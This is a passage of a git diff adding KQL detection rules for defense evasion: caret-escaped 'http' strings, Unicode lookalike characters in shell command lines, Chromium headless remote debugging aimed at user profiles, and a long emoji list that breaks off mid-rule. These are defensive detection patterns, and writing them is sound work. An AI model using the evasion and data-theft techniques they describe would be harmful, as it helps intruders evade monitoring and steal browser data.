"\\Google\\Drive\\googledrivesync.exe\\..\\"))) \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_commandline_obfuscation_using_escape_characters.kql b/KQL/rules/Defense Evasion/potential_commandline_obfuscation_using_escape_characters.kql new file mode 100644 index 00000000..c7bff6f6 --- /dev/null +++ b/KQL/rules/Defense Evasion/potential_commandline_obfuscation_using_escape_characters.kql @@ -0,0 +1,10 @@ +// Title: Potential Commandline Obfuscation Using Escape Characters +// Author: juju4 +// Date: 2018-12-11 +// Level: medium +// Description: Detects potential commandline obfuscation using known escape characters +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1140 + +DeviceProcessEvents +| where ProcessCommandLine contains "h^t^t^p" or ProcessCommandLine contains "h\"t\"t\"p" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_commandline_obfuscation_using_unicode_characters_from_suspicious_image.kql b/KQL/rules/Defense Evasion/potential_commandline_obfuscation_using_unicode_characters_from_suspicious_image.kql new file mode 100644 index 00000000..9bf81b2b --- /dev/null +++ b/KQL/rules/Defense Evasion/potential_commandline_obfuscation_using_unicode_characters_from_suspicious_image.kql @@ -0,0 +1,12 @@ +// Title: Potential CommandLine Obfuscation Using Unicode Characters From Suspicious Image +// Author: frack113, Florian Roth (Nextron Systems), Josh Nickels +// Date: 2024-09-02 +// Level: high +// Description: Detects potential commandline obfuscation using unicode characters. +Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. + +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.t1027 + +DeviceProcessEvents +| where ((FolderPath endswith "\\cmd.exe" or FolderPath endswith "\\cscript.exe" or FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\powershell_ise.exe" or FolderPath endswith "\\pwsh.exe" or FolderPath endswith "\\wscript.exe") and (ProcessVersionInfoOriginalFileName in~ ("Cmd.EXE", "cscript.exe", "PowerShell.EXE", "PowerShell_ISE.EXE", "pwsh.dll", "wscript.exe"))) and (ProcessCommandLine contains "ˣ" or ProcessCommandLine contains "˪" or ProcessCommandLine contains "ˢ" or ProcessCommandLine contains "∕" or ProcessCommandLine contains "⁄" or ProcessCommandLine contains "―" or ProcessCommandLine contains "—" or ProcessCommandLine contains " " or ProcessCommandLine contains "¯" or ProcessCommandLine contains "®" or ProcessCommandLine contains "¶" or ProcessCommandLine contains "⠀") \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_data_stealing_via_chromium_headless_debugging.kql b/KQL/rules/Defense Evasion/potential_data_stealing_via_chromium_headless_debugging.kql new file mode 100644 index 00000000..e7be3eef --- /dev/null +++ b/KQL/rules/Defense Evasion/potential_data_stealing_via_chromium_headless_debugging.kql @@ -0,0 +1,10 @@ +// Title: Potential Data Stealing Via Chromium Headless Debugging +// Author: Nasreddine Bencherchali (Nextron Systems) +// Date: 2022-12-23 +// Level: high +// Description: Detects chromium based browsers starting in headless and debugging mode and pointing to a user profile. This could be a sign of data stealing or remote control +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion, attack.credential-access, attack.collection, attack.t1185, attack.t1564.003 + +DeviceProcessEvents +| where ProcessCommandLine contains "--remote-debugging-" and ProcessCommandLine contains "--user-data-dir" and ProcessCommandLine contains "--headless" \ No newline at end of file diff --git a/KQL/rules/Defense Evasion/potential_defense_evasion_activity_via_emoji_usage_in_commandline_1.kql b/KQL/rules/Defense Evasion/potential_defense_evasion_activity_via_emoji_usage_in_commandline_1.kql new file mode 100644 index 00000000..d840a792 --- /dev/null +++ b/KQL/rules/Defense Evasion/potential_defense_evasion_activity_via_emoji_usage_in_commandline_1.kql @@ -0,0 +1,10 @@ +// Title: Potential Defense Evasion Activity Via Emoji Usage In CommandLine - 1 +// Author: @Kostastsale, TheDFIRReport +// Date: 2022-12-05 +// Level: high +// Description: Detects the usage of emojis in the command line, this could be a sign of potential defense evasion activity. +// MITRE Tactic: Defense Evasion +// Tags: attack.defense-evasion + +DeviceProcessEvents +| where ProcessCommandLine contains "😀" or ProcessCommandLine contains "😃" or ProcessCommandLine contains "😄" or ProcessCommandLine contains "😁" or ProcessCommandLine contains "😆" or ProcessCommandLine contains "😅" or ProcessCommandLine contains "😂" or ProcessCommandLine contains "🤣" or ProcessCommandLine contains "🥲" or ProcessCommandLine contains "🥹" or ProcessCommandLine contains "☺️" or ProcessCommandLine contains "😊" or ProcessCommandLine contains "😇" or ProcessCommandLine contains "🙂" or ProcessCommandLine contains "🙃" or ProcessCommandLine contains "😉" or ProcessCommandLine contains "😌" or ProcessCommandLine contains "😍" or ProcessCommandLine contains "🥰" or ProcessCommandLine contains "😘" or ProcessCommandLine contains "😗" or ProcessCommandLine contains "😙" or ProcessCommandLine contains "😚" or ProcessCommandLine contains "😋" or ProcessCommandLine contains "😛" or ProcessCommandLine contains "😝" or ProcessCommandLine contains "😜" or ProcessCommandLine contains "🤪" or ProcessCommandLine contains "🤨" or ProcessCommandLine contains "🧐" or ProcessCommandLine contains "🤓" or ProcessCommandLine contains "😎" or ProcessCommandLine contains "🥸" or ProcessCommandLine contains "🤩" or ProcessCommandLine contains "🥳" or ProcessCommandLine contains "😏" or ProcessCommandLine contains "😒" or ProcessCommandLine contains "😞" or ProcessCommandLine contains "😔" or ProcessCommandLine contains "😟" or ProcessCommandLine contains "😕" or ProcessCommandLine contains "🙁" or ProcessCommandLine contains "☹️" or ProcessCommandLine contains "😣" or ProcessCommandLine contains "😖" or ProcessCommandLine contains "😫" or ProcessCommandLine contains "😩" or ProcessCommandLine contains "🥺" or ProcessCommandLine contains "😢" or ProcessCommandLine contains "😭" or ProcessCommandLine contains "😮‍💨" or ProcessCommandLine contains "😤" or ProcessCommandLine contains "😠" or ProcessCommandLine contains "😡" or ProcessCommandLine contains "🤬" or ProcessCommandLine contains "🤯" or ProcessCommandLine contains "😳" or ProcessCommandLine contains "🥵" or ProcessCommandLine contains "🥶" or ProcessCommandLine contains "😱" or ProcessCommandLine contains "😨" or ProcessCommandLine contains "😰" or ProcessCommandLine contains "😥" or ProcessCommandLine contains "😓" or ProcessCommandLine contains "🫣" or ProcessCommandLine contains "🤗" or ProcessCommandLine contains "🫡" or ProcessCommandLine contains "🤔" or ProcessCommandLine contains "🫢" or ProcessCommandLine contains "🤭" or ProcessCommandLine contains "🤫" or ProcessCommandLine contains "🤥" or ProcessCommandLine contains "😶" or ProcessCommandLine contains "😶‍🌫️" or ProcessCommandLine contains "😐" or ProcessCommandLine contains "😑" or ProcessCommandLine contains "😬" or ProcessCommandLine contains "🫠" or ProcessCommandLine contains "🙄" or ProcessCommandLine contains "😯" or ProcessCommandLine contains "😦" or ProcessCommandLine contains "😧" or ProcessCommandLine contains "😮" or ProcessCommandLine contains "😲" or ProcessCommandLine contains "🥱" or ProcessCommandLine contains "😴" or ProcessCommandLine contains "🤤" or ProcessCommandLine contains "😪" or ProcessCommandLine contains "😵" or ProcessCommandLine contains "😵‍💫" or ProcessCommandLine contains "🫥" or ProcessCommandLine contains "🤐" or ProcessCommandLine contains "🥴" or ProcessCommandLine contains "🤢" or ProcessCommandLine contains "🤮" or ProcessCommandLine contains "🤧" or ProcessCommandLine contains "😷" or ProcessCommandLine contains "🤒" or ProcessCommandLine contains "🤕" or ProcessCommandLine contains "🤑" or ProcessCommandLine contains "🤠" or ProcessCommandLine contains "😈" or ProcessCommandLine contains "👿" or ProcessCommandLine contains "👹" or ProcessCommandLine contains "👺" or ProcessCommandLine contains "🤡" or ProcessCommandLine contains "💩" or ProcessCommandLine contains "👻" or ProcessCommandLine contains "💀" or ProcessCommandLine contains "☠️" or ProcessCommandLine contains "👽" or ProcessCommandLine contains "👾" or ProcessCommandLine contains "🤖" or ProcessCommandLine contains "🎃" or ProcessCommandLine contains "😺" or ProcessCommandLine contains "😸" or ProcessCommandLine contains "😹" or ProcessCommandLine contains "😻" or ProcessCommandLine contains "😼" or ProcessCommandLine contains "😽" or ProcessCommandLine contains "🙀" or ProcessCommandLine contains "😿" or ProcessCommandLine contains "😾" or ProcessCommandLine contains "👋" or ProcessCommandLine contains "🤚" or ProcessCommandLine contains "🖐" or ProcessCommandLine contains "✋" or ProcessCommandLine contains "🖖" or ProcessCommandLine contains "👌" or ProcessCommandLine contains "🤌" or ProcessCommandLine contains "🤏" or ProcessCommandLine contains "✌️" or ProcessCommandLine contains "🤞" or ProcessCommandLine contains "🫰" or ProcessCommandLine contains "🤟" or ProcessCommandLine contains "🤘" or ProcessCommandLine contains "🤙" or ProcessCommandLine contains "🫵" or ProcessCommandLine contains "🫱" or ProcessCommandLine contains "🫲" or ProcessCommandLine contains "🫳" or ProcessCommandLine contains "🫴" or ProcessCommandLine contains "👈" or ProcessCommandLine contains "👉" or ProcessCommandLine contains "👆" or ProcessCommandLine contains "🖕" or ProcessCommandLine contains "👇" or ProcessCommandLine contains "☝️" or ProcessCommandLine contains "👍" or ProcessCommandLine contains "👎" or ProcessCommandLine contains "✊" or ProcessCommandLine contains "👊" or ProcessCommandLine contains "🤛" or ProcessCommandLine contains "🤜" or ProcessCommandLine contains "👏" or ProcessCommandLine contains "🫶" or ProcessCommandLine contains "🙌" or ProcessCommandLine contains "👐" or ProcessCommandLine contains "🤲" or ProcessCommandLine contains "🤝" or ProcessCommandLine contains "🙏" or ProcessCommandLine contains "✍️" or ProcessCommandLine contains "💪" or ProcessCommandLine contains "🦾" or ProcessCommandLine contains "🦵" or ProcessCommandLine contains "🦿" or ProcessCommandLine contains "🦶" or ProcessCommandLine contains "👣" or ProcessCommandLine contains "👂" or ProcessCommandLine contains "🦻" or ProcessCommandLine contains "👃" or ProcessCommandLine contains "🫀" or ProcessCommandLine contains "🫁" or ProcessCommandLine contains "🧠" or ProcessCommandLine contains "🦷" or ProcessCommandLine contains "🦴" or ProcessCommandLine contains "👀" or ProcessCommandLine contains "👁" or ProcessCommandLine contains "👅" or ProcessCommandLine contains "👄" or ProcessCommandLine contains "🫦" or ProcessCommandLine contains "💋" or ProcessCommandLine contains "🩸" or ProcessCommandLine contains "👶" or ProcessCommandLine contains "👧" or ProcessCommandLine contains "🧒" or ProcessCommandLine contains "👦" or ProcessCommandLine contains "👩" or ProcessCommandLine contains "🧑" or ProcessCommandLine contains "👨" or ProcessCommandLine contains "👩‍🦱" or ProcessCommandLine contains "🧑‍🦱" or ProcessCommandLine contains "👨‍🦱" or ProcessCommandLine contains "👩‍🦰" or ProcessCommandLine contains "🧑‍🦰" or ProcessCommandLine contains "👨‍🦰" or ProcessCommandLine contains "👱‍♀️" or ProcessCommandLine contains "👱" or ProcessCommandLine contains "👱‍♂️" or ProcessCommandLine contains "👩‍🦳" or ProcessCommandLine contains "🧑‍🦳" or ProcessCommandLine contains "👨‍🦳" or ProcessCommandLine contains "👩‍🦲" or ProcessCommandLine contains "🧑‍🦲" or ProcessCommandLine contains "👨‍🦲" or ProcessCommandLine contains "🧔‍♀️" or ProcessCommandLine contains "🧔" or ProcessCommandLine contains "🧔‍♂️" or ProcessCommandLine contains "👵" or ProcessCommandLine contains "🧓" or ProcessCommandLine contains "👴" or ProcessCommandLine contains "👲" or ProcessCommandLine contains "👳‍♀️" or ProcessCommandLine contains "👳" or ProcessCommandLine contains "👳‍♂️" or ProcessCommandLine contains "🧕" or ProcessCommandLine contains "👮‍♀️" or ProcessCommandLine contains "👮" or ProcessCommandLine contains "👮‍♂️" or ProcessCommandLine contains "👷‍♀️" or ProcessCommandLine contains "👷" or ProcessCommandLine contains "👷‍♂️" or ProcessCommandLine contains "💂‍♀️" or ProcessCommandLine contains "💂" or ProcessCommandLine contains "💂‍♂️" or ProcessCommandLine contains "🕵️‍♀️" or ProcessCommandLine contains "🕵️" or ProcessCommandLine contains "🕵️‍♂️" or ProcessCommandLine contains "👩‍⚕️" or ProcessCommandLine contains "🧑‍⚕️" or ProcessCommandLine contains "👨‍⚕️" or ProcessCommandLine contains "👩‍🌾" or ProcessCommandLine contains "🧑‍🌾" or ProcessCommandLine contains "👨‍🌾" or ProcessCommandLine contains "👩‍🍳" or ProcessCommandLine contains "🧑‍🍳" or ProcessCommandLine contains "👨‍🍳" or ProcessCommandLine contains "👩‍🎓" or ProcessCommandLine contains "🧑‍🎓" or ProcessCommandLine contains "👨‍🎓" or ProcessCommandLine contains "👩‍🎤" or ProcessCommandLine contains "🧑‍🎤" or ProcessCommandLine contains "👨‍🎤" or ProcessCommandLine contains "👩‍🏫" or ProcessCommandLine contains "🧑‍🏫" or ProcessCommandLine contains "👨‍🏫" or ProcessCommandLine contains "👩‍🏭" or ProcessCommandLine contains "🧑‍🏭" or ProcessCommandLine contains "👨‍🏭" or ProcessCommandLine contains "👩‍💻" or ProcessCommandLine contains "🧑‍💻" or ProcessCommandLine contains "👨‍💻" or ProcessCommandLine contains "👩‍💼" or ProcessCommandLine contains "🧑‍💼" or ProcessCommandLine contains "👨‍💼" or ProcessCommandLine contains "👩‍🔧" or ProcessCommandLine contains "🧑‍🔧" or ProcessCommandLine contains "👨‍🔧" or ProcessCommandLine contains "👩‍🔬" or ProcessCommandLine contains "🧑‍🔬" or ProcessCommandLine contains "👨‍🔬" or ProcessCommandLine contains "👩‍🎨" or ProcessCommandLine contains "🧑‍🎨" or ProcessCommandLine contains "👨‍🎨" or ProcessCommandLine contains "👩‍🚒" or ProcessCommandLine contains "🧑‍🚒" or ProcessCommandLine contains "👨‍🚒" or ProcessCommandLine contains "👩‍✈️" or ProcessCommandLine contains "🧑‍✈️" or ProcessCommandLine contains "👨‍✈️" or ProcessCommandLine contains "👩‍🚀" or ProcessCommandLine contains "🧑‍🚀" or ProcessCommandLine contains "👨‍🚀" or ProcessCommandLine contains "👩‍⚖️" or ProcessCommandLine contains "🧑‍⚖️" or ProcessCommandLine contains "👨‍⚖️" or ProcessCommandLine contains "👰‍♀️" or ProcessCommandLine contains "👰" or ProcessCommandLine contains "👰‍♂️" or ProcessCommandLine contains "🤵‍♀️" or ProcessCommandLine contains "🤵" or ProcessCommandLine contains "🤵‍♂️" or ProcessCommandLine contains "👸" or ProcessCommandLine contains "🫅" or ProcessCommandLine contains "🤴" or ProcessCommandLine contains "🥷" or ProcessCommandLine contains "🦸‍♀️" or ProcessCommandLine contains "🦸" or ProcessCommandLine contains "🦸‍♂️" or ProcessCommandLine contains "🦹‍♀️" or ProcessCommandLine contains "🦹" or ProcessCommandLine contains "🦹‍♂️" or ProcessCommandLine contains "🤶" or ProcessCommandLine contains "🧑‍🎄" or ProcessCommandLine contains "🎅" or ProcessCommandLine contains "🧙‍♀️" or ProcessCommandLine contains "🧙" or ProcessCommandLine contains "🧙‍♂️" or ProcessCommandLine contains "🧝‍♀️" or ProcessCommandLine contains "🧝" or ProcessCommandLine contains "🧝‍♂️" or ProcessCommandLine contains "🧛‍♀️" or ProcessCommandLine contains "🧛" or ProcessCommandLine contains "🧛‍♂️" or ProcessCommandLine contains "🧟‍♀️" or ProcessCommandLine contains "🧟" or ProcessCommandLine contains "🧟‍♂️" or ProcessCommandLine contains "🧞‍♀️" or ProcessCommandLine contains "🧞" or ProcessCommandLine contains "🧞‍♂️" or ProcessCommandLine contains "🧜‍♀️" or ProcessCommandLine contains "🧜" or ProcessCommandLine contains "🧜‍♂️" or ProcessCommandLine contains "🧚‍♀️" or ProcessCommandLine contains "🧚" or ProcessCommandLine contains "🧚‍♂️" or ProcessCommandLine contains "🧌" or ProcessCommandLine contains "👼" or ProcessCommandLine contains "🤰" or ProcessCommandLine contains "🫄" or ProcessCommandLine contains "🫃" or ProcessCommandLine contains "🤱" or ProcessCommandLine contains "👩‍🍼" or ProcessCommandLine contains "🧑‍🍼" or ProcessCommandLine contains "👨‍🍼" or ProcessCommandLine contains "🙇‍♀️" or ProcessCommandLine contains "🙇" or ProcessCommandLine contains "🙇‍♂️" or ProcessCommandLine contains "💁‍♀️" or ProcessCommandLine contains "💁" or ProcessCommandLine contains "💁‍♂️" or ProcessCommandLine contains "🙅‍♀️" or ProcessCommandLine contains "🙅" or ProcessCommandLine contains "🙅‍♂️" or ProcessCommandLine contains "🙆‍♀️" or ProcessCommandLine contains "🙆" or ProcessCommandLine contains "🙆‍♂️" or ProcessCommandLine contains "🙋‍♀️" or ProcessCommandLine contains "🙋" or ProcessCommandLine contains "🙋‍♂️" or ProcessCommandLine contains "🧏‍♀️" or ProcessCommandLine contains "🧏" or ProcessCommandLine contains "🧏‍♂️" or ProcessCommandLine contains "🤦‍♀️" or ProcessCommandLine contains "🤦" or ProcessCommandLine contains "🤦‍♂️" or ProcessCommandLine contains "🤷‍♀️" or ProcessCommandLine contains "🤷" or ProcessCommandLine contains "🤷‍♂️" or ProcessCommandLine contains "🙎‍♀️" or ProcessCommandLine contains "🙎" or ProcessCommandLine contains "🙎‍♂️" or ProcessCommandLine contains "🙍‍♀️" or ProcessCommandLine contains "🙍" or ProcessCommandLine contains "🙍‍♂️" or ProcessCommandLine contains "💇‍♀️" or ProcessCommandLine contains "💇" or ProcessCommandLine contains "💇‍♂️" or ProcessCommandLine contains "💆‍♀️" or ProcessCommandLine contains "💆" or ProcessCommandLine contains "💆‍♂️" or ProcessCommandLine contains "🧖‍♀️" or ProcessCommandLine contains "🧖" or ProcessCommandLine contains "🧖‍♂️" or ProcessCommandLine contains "💅" or ProcessCommandLine contains "💃" or ProcessCommandLine contains "🕺" or ProcessCommandLine contains "👯‍♀️" or ProcessCommandLine contains "👯" or ProcessCommandLine contains "👯‍♂️" or ProcessCommandLine contains "🕴" or ProcessCommandLine contains "👩‍🦽" or ProcessCommandLine contains "🧑‍🦽" or ProcessCommandLine contains "👨‍🦽" or ProcessCommandLine contains "👩‍🦼" or ProcessCommandLine contains "🧑‍🦼" or ProcessCommandLine contains "👨‍🦼" or ProcessCommandLine contains "🚶‍♀️" or ProcessCommandLine contains "🚶" or ProcessCommandLine contains "🚶‍♂️" or ProcessCommandLine contains "👩‍🦯" or ProcessCommandLine contains "🧑‍🦯" or ProcessCommandLine contains "👨‍🦯" or ProcessCommandLine contains "🧎‍♀️" or ProcessCommandLine contains "🧎" or ProcessCommandLine contains "🧎‍♂️" or ProcessCommandLine contains "🏃‍♀️" or ProcessCommandLine contains "🏃" or ProcessCommandLine contains "🏃‍♂️" or ProcessCommandLine contains "🧍‍♀️" or ProcessCommandLine contains "🧍" or ProcessCommandLine contains "🧍‍♂️" or ProcessCommandLine contains "👭" or ProcessCommandLine contains "🧑‍🤝‍🧑" or ProcessCommandLine contains "👬" or ProcessCommandLine contains "👫" or ProcessCommandLine contains "👩‍❤️‍👩" or ProcessCommandLine contains "💑" or ProcessCommandLine contains "👨‍❤️‍👨" or ProcessCommandLine contains "👩‍❤️‍👨" or ProcessCommandLine contains "👩‍❤️‍💋‍👩" or ProcessCommandLine contains "💏" or ProcessCommandLine contains "👨‍❤️‍💋‍👨" or ProcessCommandLine contains "👩‍❤️‍💋‍👨" or ProcessCommandLine contains "👪" or ProcessCommandLine contains "👨‍👩‍👦" or ProcessCommandLine contains "👨‍👩‍👧" or ProcessCommandLine contains "👨‍👩‍👧‍👦" or ProcessCommandLine contains "👨‍👩‍👦‍👦" or ProcessCommandLine contains "👨‍👩‍👧‍👧" or ProcessCommandLine contains "👨‍👨‍👦" or ProcessCommandLine contains "👨‍👨‍👧" or ProcessCommandLine contains "👨‍👨‍👧‍👦" or ProcessCommandLine contains "👨‍👨‍👦‍👦" or ProcessCommandLine contains "👨‍👨‍👧‍👧" or ProcessCommandLine contains "👩‍👩‍👦" or ProcessCommandLine contains "👩‍👩‍👧" or ProcessCommandLine contains "👩‍👩‍👧‍👦" or ProcessCommandLine contains "👩‍👩‍👦‍👦" or ProcessCommandLine contains "👩‍👩‍👧‍👧" or ProcessCommandLine contains "👨‍👦" or ProcessCommandLine contains "👨‍👦‍👦" or ProcessCommandLine contains "👨‍👧" or ProcessCommandLine contains "👨‍👧‍👦" or ProcessCommandLine contains "👨‍👧‍👧" or ProcessCommandLine contains "👩‍👦" or ProcessCommandLine contains "👩‍👦‍👦" or ProcessCommandLine contains "👩‍👧" or ProcessCommandLine contains "👩‍👧‍👦" or ProcessCommandLine contains "👩‍👧‍👧" or ProcessCommandLine contains "🗣" or ProcessCommandLine contains "👤" or ProcessCommandLine contains "👥" or ProcessCommandLine contains "🫂" or ProcessCommandLine contains "🧳" or ProcessCommandLine contains "🌂" or ProcessCommandLine contains "☂️" or ProcessCommandLine contains "🧵" or ProcessCommandLine contains "🪡" or ProcessCommandLine contains "🪢" or ProcessCommandLine contains "🧶" or ProcessCommandLine contains "👓" or ProcessCommandLine contains "🕶" or ProcessCommandLine contains "🥽" or ProcessCommandLine contains "🥼" or ProcessCommandLine contains "🦺" or ProcessCommandLine contains "👔" or ProcessCommandLine contains "👕" or ProcessCommandLine contains "👖" or ProcessCommandLine contains "🧣" or ProcessCommandLine contains "🧤" or ProcessCommandLine contains "🧥" or ProcessCommandLine contains "🧦" or ProcessCommandLine contains "👗" or ProcessCommandLine contains "👘" or ProcessCommandLine contains "🥻" or ProcessCommandLine contains "🩴" or ProcessCommandLine contains "🩱" or ProcessCommandLine contains "🩲" or ProcessCommandLine contains "🩳" or ProcessCommandLine contains "👙" or ProcessCommandLine contains "👚" or ProcessCommandLine contains "👛" or ProcessCommandLine contains "👜" or ProcessCommandLine contains "👝" or ProcessCommandLine contains "🎒" or ProcessCommandLine contains "👞" or ProcessCommandLine contains "👟" or ProcessCommandLine contains "🥾" or ProcessCommandLine contains "🥿" or ProcessCommandLine contains "👠" or ProcessCommandLine contains "👡" or ProcessCommandLine contains "🩰" or ProcessCommandLine contains "👢" or ProcessCommandLine contains "👑" or ProcessCommandLine contains "👒" or ProcessCommandLine contains "🎩" or ProcessCommandLine contains "🎓" or ProcessCommandLine contains "🧢" or ProcessCommandLine contains "⛑" or ProcessCommandLine contains "🪖" or ProcessCommandLine contains "💄" or ProcessCommandLine contains "💍" or ProcessCommandLine contains "💼" or ProcessCommandLine contains "👋🏻" or ProcessCommandLine contains "🤚🏻" or ProcessCommandLine contains "🖐🏻" or ProcessCommandLine contains "✋🏻" or ProcessCommandLine contains "🖖🏻" or ProcessCommandLine contains "👌🏻" or ProcessCommandLine contains "🤌🏻" or ProcessCommandLine contains "🤏🏻" or ProcessCommandLine contains "✌🏻" or ProcessCommandLine contains "🤞🏻" or ProcessCommandLine contains "🫰🏻" or ProcessCommandLine contains "🤟🏻" or ProcessCommandLine contains "🤘🏻" or ProcessCommandLine contains "🤙🏻" or ProcessCommandLine contains "🫵🏻" or ProcessCommandLine contains "🫱🏻" or ProcessCommandLine contains "🫲🏻" or ProcessCommandLine contains "🫳🏻" or ProcessCommandLine contains "🫴🏻" or ProcessCommandLine contains "👈🏻" or ProcessCommandLine contains "👉🏻" or ProcessCommandLine contains "👆🏻" or ProcessCommandLine contains "🖕🏻" or ProcessCommandLine contains "👇🏻" or ProcessCommandLine contains "☝🏻" or ProcessCommandLine contains "👍🏻" or ProcessCommandLine contains "👎🏻" or ProcessCommandLine contains "✊🏻" or ProcessCommandLine contains "👊🏻" or ProcessCommandLine contains "🤛🏻" or ProcessCommandLine contains "🤜🏻" or ProcessCommandLine contains "👏🏻" or ProcessCommandLine contains "🫶🏻" or ProcessCommandLine contains "🙌🏻" or ProcessCommandLine contains "👐🏻" or ProcessCommandLine contains "🤲🏻" or ProcessCommandLine contains "🙏🏻" or ProcessCommandLine contains "✍🏻" or ProcessCommandLine contains "💪🏻" or ProcessCommandLine contains "🦵🏻" or ProcessCommandLine contains "🦶🏻" or ProcessCommandLine contains "👂🏻" or ProcessCommandLine contains "🦻🏻" or ProcessCommandLine contains "👃🏻" or ProcessCommandLine contains "👶🏻" or ProcessCommandLine contains "👧🏻" or ProcessCommandLine contains "🧒🏻" or ProcessCommandLine contains "👦🏻" or ProcessCommandLine contains "👩🏻" or ProcessCommandLine contains "🧑🏻" or ProcessCommandLine contains "👨🏻" or ProcessCommandLine contains "👩🏻‍🦱" or ProcessCommandLine contains "🧑🏻‍🦱" or ProcessCommandLine contains "👨🏻‍🦱" or ProcessCommandLine contains "👩🏻‍🦰" or ProcessCommandLine contains "🧑🏻‍🦰" or ProcessCommandLine contains "👨🏻‍🦰" or ProcessCommandLine contains "👱🏻‍♀️" or ProcessCommandLine contains "👱🏻" or ProcessCommandLine contains "👱🏻‍♂️" or ProcessCommandLine contains "👩🏻‍🦳" or ProcessCommandLine contains "🧑🏻‍🦳" or ProcessCommandLine contains "👨🏻‍🦳" or ProcessCommandLine contains "👩🏻‍🦲" or ProcessCommandLine contains "🧑🏻‍🦲" or ProcessCommandLine contains "👨🏻‍🦲" or ProcessCommandLine contains "🧔🏻‍♀️" or ProcessCommandLine contains "🧔🏻" or ProcessCommandLine contains "🧔🏻‍♂️" or ProcessCommandLine contains "👵🏻" or ProcessCommandLine contains "🧓🏻" or ProcessCommandLine contains "👴🏻" or ProcessCommandLine contains "👲🏻" or ProcessCommandLine contains "👳🏻‍♀️" or ProcessCommandLine contains "👳🏻" or ProcessCommandLine contains "👳🏻‍♂️" or ProcessCommandLine contains "🧕🏻" or ProcessCommandLine contains "👮🏻‍♀️" or ProcessCommandLine contains "👮🏻" or ProcessCommandLine contains "👮🏻‍♂️" or ProcessCommandLine contains "👷🏻‍♀️" or ProcessCommandLine contains "👷🏻" or ProcessCommandLine contains "👷🏻‍♂️" or ProcessCommandLine contains "💂🏻‍♀️" or ProcessCommandLine contains "💂🏻" or ProcessCommandLine contains "💂🏻‍♂️" or ProcessCommandLine contains "🕵🏻‍♀️" or ProcessCommandLine contains "🕵🏻" or ProcessCommandLine contains "🕵🏻‍♂️" or ProcessCommandLine contains "👩🏻‍⚕️" or ProcessCommandLine contains "🧑🏻‍⚕️" or ProcessCommandLine contains "👨🏻‍⚕️" or ProcessCommandLine contains "👩🏻‍🌾" or ProcessCommandLine contains "🧑🏻‍🌾" or ProcessCommandLine contains "👨🏻‍🌾" or ProcessCommandLine contains "👩🏻‍🍳" or ProcessCommandLine contains "🧑🏻‍🍳" or ProcessCommandLine contains "👨🏻‍🍳" or ProcessCommandLine contains "👩🏻‍🎓" or ProcessCommandLine contains "🧑🏻‍🎓" or ProcessCommandLine contains "👨🏻‍🎓" or ProcessCommandLine contains "👩🏻‍🎤" or ProcessCommandLine contains "🧑🏻‍🎤" or ProcessCommandLine contains "👨🏻‍🎤" or ProcessCommandLine contains "👩🏻‍🏫" or ProcessCommandLine contains "🧑🏻‍🏫" or ProcessCommandLine contains "👨🏻‍🏫" or ProcessCommandLine contains "👩🏻‍🏭" or ProcessCommandLine contains "🧑🏻‍🏭" or ProcessCommandLine contains "👨🏻‍🏭" or ProcessCommandLine contains "👩🏻‍💻" or ProcessCommandLine contains "🧑🏻‍💻" or ProcessCommandLine contains "👨🏻‍💻" or ProcessCommandLine contains "👩🏻‍💼" or ProcessCommandLine contains "🧑🏻‍💼" or ProcessCommandLine contains "👨🏻‍💼" or ProcessCommandLine contains "👩🏻‍🔧" or ProcessCommandLine contains "🧑🏻‍🔧" or ProcessCommandLine contains "👨🏻‍🔧" or ProcessCommandLine contains "👩🏻‍🔬" or ProcessCommandLine contains "🧑🏻‍🔬" or ProcessCommandLine contains "👨🏻‍🔬" or ProcessCommandLine contains "👩🏻‍🎨" or ProcessCommandLine contains "🧑🏻‍🎨" or ProcessCommandLine contains "👨🏻‍🎨" or ProcessCommandLine contains "👩🏻‍🚒" or ProcessCommandLine contains "🧑🏻‍🚒" or ProcessCommandLine contains "👨🏻‍🚒" or ProcessCommandLine contains "👩🏻‍✈️" or ProcessCommandLine contains "🧑🏻‍✈️" or ProcessCommandLine contains "👨🏻‍✈️" or ProcessCommandLine contains "👩🏻‍🚀" or ProcessCommandLine contains "🧑🏻‍🚀" or ProcessCommandLine contains "👨🏻‍🚀" or ProcessCommandLine contains "👩🏻‍⚖️" or ProcessCommandLine contains "🧑🏻‍⚖️" or ProcessCommandLine contains "👨🏻‍⚖️" or ProcessCommandLine contains "👰🏻‍♀️" or ProcessCommandLine contains "👰🏻" or ProcessCommandLine contains "👰🏻‍♂️" or ProcessCommandLine contains "🤵🏻‍♀️" or ProcessCommandLine contains "🤵🏻" or ProcessCommandLine contains "🤵🏻‍♂️" or ProcessCommandLine contains "👸🏻" or ProcessCommandLine contains "🫅🏻" or ProcessCommandLine contains "🤴🏻" or ProcessCommandLine contains "🥷🏻" or ProcessCommandLine contains "🦸🏻‍♀️" or ProcessCommandLine contains "🦸🏻" or ProcessCommandLine contains "🦸🏻‍♂️" or ProcessCommandLine contains "🦹🏻‍♀️" or ProcessCommandLine contains "🦹🏻" or ProcessCommandLine contains "🦹🏻‍♂️" or ProcessCommandLine contains "🤶🏻" or ProcessCommandLine contains "🧑🏻‍🎄" or ProcessCommandLine contains "🎅🏻" or ProcessCommandLine contains "🧙🏻‍♀️" or ProcessCommandLine contains "🧙🏻" or ProcessCommandLine contains "🧙🏻‍♂️" or ProcessCommandLine contains "🧝🏻‍♀️" or ProcessCommandLine contains "🧝🏻" or ProcessCommandLine contains "🧝🏻‍♂️" or ProcessCommandLine contains "🧛🏻‍♀️" or ProcessCommandLine contains "🧛🏻" or ProcessCommandLine contains "🧛🏻‍♂️" or ProcessCommandLine contains "🧜🏻‍♀️" or ProcessCommandLine contains "🧜🏻" or ProcessCommandLine contains "🧜🏻‍♂️" or ProcessCommandLine contains "🧚🏻‍♀️" or ProcessCommandLine contains "🧚🏻" or ProcessCommandLine contains "🧚🏻‍♂️" or ProcessCommandLine contains "👼🏻" or ProcessCommandLine contains "🤰🏻" or ProcessCommandLine contains "🫄🏻" or ProcessCommandLine contains "🫃🏻" or ProcessCommandLine contains "🤱🏻" or ProcessCommandLine contains "👩🏻‍🍼" or ProcessCommandLine contains "🧑🏻‍🍼" 